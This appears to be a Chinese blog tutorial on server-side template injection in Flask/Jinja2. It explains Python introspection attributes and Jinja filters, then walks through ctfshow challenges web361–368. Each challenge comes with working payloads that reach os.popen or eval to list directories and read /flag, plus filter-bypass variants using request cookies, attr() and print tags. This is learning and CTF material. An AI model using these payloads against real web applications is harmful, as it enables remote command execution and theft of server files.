初识SSTI

发布时间:2025-12-09 16:20:40 浏览次数:4

SSTI概念

SSTI就是服务器端模板注入(Server-Side Template Injection),实际上也是一种注入漏洞;可以类比于SQL注入,实际上这两者的基本思想是一致的;

SSTI也是获取了一个输入,然后在后端的渲染处理上进行了语句的拼接,之后便是执行;SSTI利用的是现在网站模板引擎(Python的jinja2、mako、tornado、django;PHP的smarty、twig;JAVA的jade、等等),当在运用这些框架对运用渲染函数生成html的时候便会出现SSTI的问题

什么是模板引擎?

模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,用于网站的模板引擎就会生成一个标准的HTML文档。

简单来说就是利用模板引擎来生成一套前端HTML代码,只需要获取用户的数据,然后放到渲染函数中,之后便生成模板+用户数据的前端HTML页面,然后反馈给浏览器,呈现在用户的面前

引发SSTI的原因

渲染函数在渲染的时候,往往不会对用户输入的变量进行渲染;

如何判断SSTI类型

这是在网上找到的图片,根据处理返回值的不同来判断SSTI的类型:

SSTI常用类

__class__

__class__用来查看变量所属的类,格式为:变量.__class__

''.__class__ #<class 'str'>().__class__ #<class 'tuple'>{}.__class__ #<class 'dict'>[].__class__ #<class 'list'>

__bases__

__bases__用来查看类的基类,注意是类的基类,所以格式应该是:变量.__class__.__bases__

>>> ''.__class__.__bases__(<class 'object'>,)>>> ().__class__.__bases__(<class 'object'>,)>>> {}.__class__.__bases__(<class 'object'>,)>>> [].__class__.__bases__(<class 'object'>,)

同时也可以加上数组,来指定获取第几个基类;例如:变量.__class__.bases__[0] 代表着获取第一个基类

还有一个类是__mro__,他显示类和基类,这是与__bases__不同的地方:

>>> ''.__class__.__mro__(<class 'str'>, <class 'object'>)

__subclasses__

__subclasses__()用来查看当前类的子类,格式为:变量.__class__.__bases__[0].__subclasses__()

当然和__bases__一样,也可以加上数组,来查看指定的索引值:

>>> ''.__class__.__bases__[0].__subclasses__()[0]<class 'type'>

类的知识总结(转载)

__class__ 类的一个内置属性,表示实例对象的类。__base__ 类型对象的直接基类__bases__ 类型对象的全部基类,以元组形式,类型的实例通常没有属性 __bases____mro__ 此属性是由类组成的元组,在方法解析期间会基于它来查找基类。__subclasses__() 返回这个类的子类集合,Each class keeps a list of weak references to its immediate subclasses. This method returns a list of all those references still alive. The list is in definition order.__init__ 初始化类,返回的类型是function__globals__ 使用方式是 函数名.__globals__获取function所处空间下可使用的module、方法以及所有变量。__dic__ 类的静态函数、类函数、普通函数、全局变量以及一些内置的属性都是放在类的__dict__里__getattribute__() 实例、类、函数都具有的__getattribute__魔术方法。事实上,在实例化的对象进行.操作的时候(形如:a.xxx/a.xxx()),都会自动去调用__getattribute__方法。因此我们同样可以直接通过这个方法来获取到实例、类、函数的属性。__getitem__() 调用字典中的键值,其实就是调用这个魔术方法,比如a['b'],就是a.__getitem__('b')__builtins__ 内建名称空间,内建名称空间有许多名字到对象之间映射,而这些名字其实就是内建函数的名称,对象就是这些内建函数本身。即里面有很多常用的函数。__builtins__与__builtin__的区别就不放了,百度都有。__import__ 动态加载类和函数,也就是导入模块,经常用于导入os模块,__import__('os').popen('ls').read()]__str__() 返回描写这个对象的字符串,可以理解成就是打印出来。url_for flask的一个方法,可以用于得到__builtins__,而且url_for.__globals__['__builtins__']含有current_app。get_flashed_messages flask的一个方法,可以用于得到__builtins__,而且get_flashed_messages.__globals__['__builtins__']含有current_app。lipsum flask的一个方法,可以用于得到__builtins__,而且lipsum.__globals__含有os模块:{{lipsum.__globals__['os'].popen('ls').read()}}current_app 应用上下文,一个全局变量。request 可以用于获取字符串来绕过,包括下面这些,引用一下羽师傅的。此外,同样可以获取open函数:request.__init__.__globals__['__builtins__'].open('/proc\self\fd/3').read()request.args.x1 get传参request.values.x1 所有参数request.cookies cookies参数request.headers 请求头参数request.form.x1 post传参(Content-Type:applicaation/x-www-form-urlencoded或multipart/form-data)request.data post传参(Content-Type:a/b)request.json post传json (Content-Type: application/json)config 当前application的所有配置。此外,也可以这样{{ config.__class__.__init__.__globals__['os'].popen('ls').read() }}g {{g}}得到<flask.g of 'flask_ssti'>

常见过滤器(转载)

常用的过滤器:int():将值转换为int类型;float():将值转换为float类型;lower():将字符串转换为小写;upper():将字符串转换为大写;title():把值中的每个单词的首字母都转成大写;capitalize():把变量值的首字母转成大写,其余字母转小写;trim():截取字符串前面和后面的空白字符;wordcount():计算一个长字符串中单词的个数;reverse():字符串反转;replace(value,old,new): 替换将old替换为new的字符串;truncate(value,length=255,killwords=False):截取length长度的字符串;striptags():删除字符串中所有的HTML标签,如果出现多个空格,将替换成一个空格;escape()或e:转义字符,会将<、>等符号转义成HTML中的符号。显例:content|escape或content|e。safe(): 禁用HTML转义,如果开启了全局转义,那么safe过滤器会将变量关掉转义。示例: {{'<em>hello</em>'|safe}};list():将变量列成列表;string():将变量转换成字符串;join():将一个序列中的参数值拼接成字符串。示例看上面payload;abs():返回一个数值的绝对值;first():返回一个序列的第一个元素;last():返回一个序列的最后一个元素;format(value,arags,*kwargs):格式化字符串。比如:{{ "%s" - "%s"|format('Hello?',"Foo!") }}将输出:Helloo? - Foo!length():返回一个序列或者字典的长度;sum():返回列表内数值的和;sort():返回排序后的列表;default(value,default_value,boolean=false):如果当前变量没有值,则会使用参数中的值来代替。示例:name|default('xiaotuo')----如果name不存在,则会使用xiaotuo来替代。boolean=False默认是在只有这个变量为undefined的时候才会使用default中的值,如果想使用python的形式判断是否为false,则可以传递boolean=true。也可以使用or来替换。length()返回字符串的长度,别名是count

练习(ctfshow)

web361

进入首页:(回头看hint,发现”名字就是考点“,经过测试传参为name)

传递参数?name={{7*7}},得到回显为49

  • 根据上文提到的,先来找变量所属的类以及当前的类的基类是什么,用空字符来测试;

  • 在Python中,所有的类都会继承Object类,如果定义一个类没有指定继承某个类,那么默认继承的是Object类

    ?name={{''.__class__.__bases__[0]}}
  • 之后便是找类的子类,使用的就是__subclasses__()

  • ?name={{''.__class__.__bases__[0].__subclasses__()}}
  • 找到所有的子类的集合之后,我们需要找出一个能够使用的类,要求这个类的某一个方法能够被我们用于执行和寻找flag

  • 这里使用的是第133个类(第一个类的索引值为0):

  • 之后便是实例化这个类,使用__init__(初始化类,返回的类型是function),实例化类之后,通过全局变量globals来查看所有的方法(初始化类之后,使用function.__globals__来查看function所处空间下可使用的module、方法和所有的变量)

  • ?name={{''.__class__.__bases__[0].__subclasses__()[132].__init__.__globals__}}
  • 根据方法来获取flag

  • ?name={{''.__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('ls /').read()}}?name={{''.__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}

    web362

    "开始过滤了..." 首页还是一样的!

    还是按照上面的方法先试试:

    到这里还是可以的,也就是说我们可以获得第一个基类下面的所有的子类的集合,但是发现无法使用第133个类:

    PS:因为过滤了数字2 3

    这里就需要另谋他路了,上面附上了一张类的知识的总结表(转载);其中存在下面的几个知识点:

  • __builtins__:内建名称空间,内建名称空间有许多名字到对象之间映射,而这些名字其实就是内建函数的名称,对象就是这些内建函数本身。即里面有很多常用的函数(比如说eval、import)。

  • url_for:flask的一个方法,可以用于得到__builtins__,而且url_for.__globals__['__builtins__']含有current_app。

  • get_flashed_messages:flask的一个方法,可以用于得到__builtins__,而且get_flashed_messages.__globals__['__builtins__']含有current_app。

  • lipsum:flask的一个方法,可以用于得到__builtins__,而且lipsum.__globals__含有os模块:{{lipsum.__globals__['os'].popen('ls').read()}}

  • 所以可以使用上面的三种方法来得到__builtins__,之后便是内含的模块,进行命令执行获取flag;

    ?name={{url_for.__globals__.__builtins__['eval']("__import__('os').popen('ls /').read()")}}?name={{get_flashed_messages.__globals__.__builtins__['eval']("__import__('os').popen('cat /flag').read()")}}?name={{lipsum.__globals__.__builtins__['eval']("__import__('os').popen('cat /flag').read()")}}

    还有一种方法可以获取到__builtins__:

    ?name={{xx.__init__.__globals__}}

    这里的xx可以是26个英文字符的任意组合;

    web363

    PS:过滤了单双引号

    利用request方法绕过:

    我们还是利用上面的payload来打,唯一被过滤的地方就是单双引号,我们先来看看上一关的payload和使用request方法绕过单双引号的payload有什么不一样:

    ?name={{get_flashed_messages.__globals__.__builtins__.eval(request.args.x1)}}&x1=__import__('os').popen('ls').read()#上面的payload是使用了request来绕过引号,而下面的payload就是我们正常的payload?name={{get_flashed_messages.__globals__.__builtins__.eval("__import__('os').popen('ls').read()")}}

    web364

    经过测试发现还是过滤了单双引号,并且还过滤args;可以更换请求方式例如POST、Cookie的方式传递参数;

    但是在使用post方式的时候,提示:

    使用cookie便可绕过;

    ?name={{lipsum.__globals__.__builtins__.eval(request.cookies.x)}}cookie: x=__import__('os').popen('cat /flag').read()

    web365

    用上面的payload继续打还是可以打通的;过滤引号以及中括号

    ?name={{url_for.__globals__.os.popen(request.cookies.x).read()}}Cookie: x = ls /?name={{url_for.__globals__.os.popen(request.cookies.x).read()}}Cookie: x = cat /flag

    web366

    过滤引号、中括号、args还过滤了下划线,那么现在的问题就是想办法绕过下划线;经过百度查询,同样还是利用request.values来绕过,但是题目中还是过滤了中括号的:

    ?name={{lipsum.(request.cookies.globals).(request.cookies.builtins).eval(request.cookies.x)}}

    cookie:globals=__globals__;builtins=__builtins__;x=__import__('os').popen('ls /').read()

    发现这种方式是会出现500错误的;这里要使用的是attr() 他是flask自带的过滤器

    "".__class__ 相当于 ""|attr("__class__")

    PS:常用于”.“号或者是下划线被过滤

    ?name={{lipsum.__globals__.__builtins__.os.popen('ls /').read()}}?name={{(lipsum|attr(request.cookies.x1)).os.popen(request.cookies.x2).read()}}

    web367

    过滤了引号、中括号、下划线

    同样还是使用上面的payload继续打:

    发现还是可以打通的,但是后面使用os的时候,发现被过滤了:可以使用request.cookies.a来绕过;

    ?name={{(lipsum|attr(request.cookies.a)).get(request.cookies.b).popen(request.cookies.c).read()}}

    web368

    经过测试发现,应该是在上面的题目的基础上增加过滤“{{“开头, 以”}}“结尾;

    使用的是%和print来绕过;

    ?name={%print(lipsum|attr(request.cookies.a)).get(request.cookies.b).popen(request.cookies.c).read()%}

    文章参考:https://blog.csdn.net/rfrder/article/details/113866139

    https://blog.csdn.net/miuzzx/article/details/110220425

    https://blog.csdn.net/qq_42880719/article/details/122699710?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522167695429516782427448079%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&request_id=167695429516782427448079&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~first_rank_ecpm_v1~rank_v31_ecpm-7-122699710-null-null.142^v73^pc_search_v2,201^v4^add_ask,239^v2^insert_chatgpt&utm_term=ctfshow%20ssti&spm=1018.2226.3001.4187

    需要做网站?需要网络推广?欢迎咨询客户经理 13272073477